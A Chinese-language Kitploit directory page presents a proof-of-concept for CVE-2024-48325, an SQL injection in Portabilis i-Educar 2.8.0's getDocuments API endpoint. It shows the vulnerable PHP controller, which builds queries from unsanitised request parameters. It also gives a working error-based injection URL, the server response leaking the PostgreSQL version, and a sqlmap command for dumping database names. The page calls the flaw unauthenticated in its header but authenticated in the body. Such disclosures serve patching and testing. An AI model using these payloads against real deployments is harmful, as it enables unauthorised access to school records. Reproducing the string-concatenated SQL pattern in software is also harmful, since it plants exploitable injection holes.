Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-48325 — Portabilis i-Educar 2.8.0 SQL注入的概念验证,演示通过getDocuments端点进行未经身份验证的数据库访问,并使用SQLMap自动利用。 | Kitploit
工具/GitHubGitHub/osvaldotenorio/cve-2024-48325
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试数据库安全
GitHubosvaldotenorio/cve-2024-48325

cve-2024-48325

Portabilis i-Educar 2.8.0 SQL注入的概念验证,演示通过getDocuments端点进行未经身份验证的数据库访问,并使用SQLMap自动利用。

查看仓库
171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48325

描述: 已认证用户可利用 InstituicaoDocumentacaoController 类的 getDocuments 函数中存在的 SQL 注入漏洞。/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id 中的 instituicao_id 参数未正确过滤,允许已认证的远程攻击者注入恶意 SQL 命令。

版本: 发现于 Portabilis i-Educar 2.8.0。

概念验证

漏洞详情

该问题存在于 InstituicaoDocumentacaoController 类的 getDocuments 函数中,可通过以下端点触发:

class InstituicaoDocumentacaoController extends ApiCoreController
{
    protected function insertDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $var2 = $this->getRequest()->titulo_documento;
        $var3 = $this->getRequest()->url_documento;
        $var4 = $this->getRequest()->ref_usuario_cad;
        $var5 = $this->getRequest()->ref_cod_escola;
        $sql = "INSERT INTO pmieducar.instituicao_documentacao (instituicao_id, titulo_documento, url_documento, ref_usuario_cad, ref_cod_escola) VALUES ($var1, '$var2', '$var3', $var4, $var5)";
        $this->fetchPreparedQuery($sql);
        $sql = "SELECT MAX(id) FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1";
        $novoId = $this->fetchPreparedQuery($sql);
        return ['id' => $novoId[0][0]];
    }
    
    protected function getDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $sql = "SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1 ORDER BY id DESC";
        $instituicao = $this->fetchPreparedQuery($sql);
        $attrs = ['id', 'titulo_documento', 'url_documento', 'ref_usuario_cad', 'ref_cod_escola'];
        $instituicao = Portabilis_Array_Utils::filterSet($instituicao, $attrs);
        return ['documentos' => $instituicao];
    }
}

漏洞发生方式

instituicao_id 参数直接在 SQL 查询中使用,未进行适当过滤或参数化。这使得攻击者可以发送恶意 HTTP 请求来注入 SQL 命令,从而可能未经授权访问数据库或操纵数据。

  • 触发漏洞的示例端点: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14
  • 示例利用: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14+AND+(CAST(VERSION()+AS+INTEGER))%3d1

服务器响应:

{
    "oper": "get",
    "resource": "getDocuments",
    "msgs": [
        {
            "msg": "Exception: Error preparing query (SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC) in the database: Exception: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for type integer: \"PostgreSQL 16.4 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20240309) 13.2.1 20240309, 64-bit\" (Connection: pgsql, SQL: SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC)",
            "type": "error"
        }
    ],
    "any_error_msg": true
}

自动化利用

  • 该漏洞也可通过 SQLMap 等自动化工具利用,从而实现数据库枚举: sqlmap -r ../instituicaoDocumentacao.r --dbms postgres --dbs -p instituicao_id --risk 3 --level 5

SQLMap

下载工具